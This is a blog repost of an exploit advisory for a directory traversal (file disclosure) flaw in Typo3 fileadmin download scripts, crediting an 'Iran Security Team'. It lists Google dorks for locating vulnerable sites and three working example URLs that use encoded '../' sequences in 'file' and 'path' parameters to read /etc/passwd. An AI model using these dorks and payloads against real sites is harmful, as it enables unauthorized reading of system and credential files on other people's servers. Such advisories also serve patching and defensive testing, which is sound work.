Typo3 - Directory Traversal Vulnerability

Posted by Hemant at Sunday, November 03, 2013 on Sunday, 3 November 2013

EDB-ID: 29355 CVE: N/A OSVDB-ID: N/A
Author: Ali Morshedloo Published: 2013-11-01 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

###########################
# Exploit Title : Typo3 File Disclosure
# Exploit Author : Iran Security Team
# Discovered By : Red.Eagle
# Home : WWW.IrSecTeam.org
# Dork1 : inurl:fileadmin/php/commun/download.php
# Dork2 : inurl:fileadmin/scripts/download.php

# Date: 2013 1 November
# Tested on:windows 7
# Software Link: http://typo3.org/
# Contact To Me: https://www.facebook.com/r3d.3agl3
###########################

#
# Exmple :http://127.0.0.1/fileadmin/php/commun/download.php?file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
#
# Exmple :http://127.0.0.1/fileadmin/scripts/download.php?path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
#
# Exmple :http://127.0.0.1/fileadmin/php/download.php?path=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
#
# Sp Tnx To : Special Tnx To : Det3cT0r - GoldHat - Mr.Rahgozar - Mehran BBC - Game Over - Z3ro C00l - Retn0Hack - Saeed0511 - Ir.Soldier - Red.Eagle - Alimp5 - Arshia Mahkom - Poya21 - Exploit Black - Hot0n - 4m!r - Hasani_farhad - InJecTable - Mosi.Pro - Kandgi_Boy And  All Members Of Iran Security Team
#
#
###########################

Pin It

Labels: , , , , ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Hey Guys I am making a Penetration Testing Linux Distro & I need a name for it could u plzz suggest me one ... so far following are the suggestions I got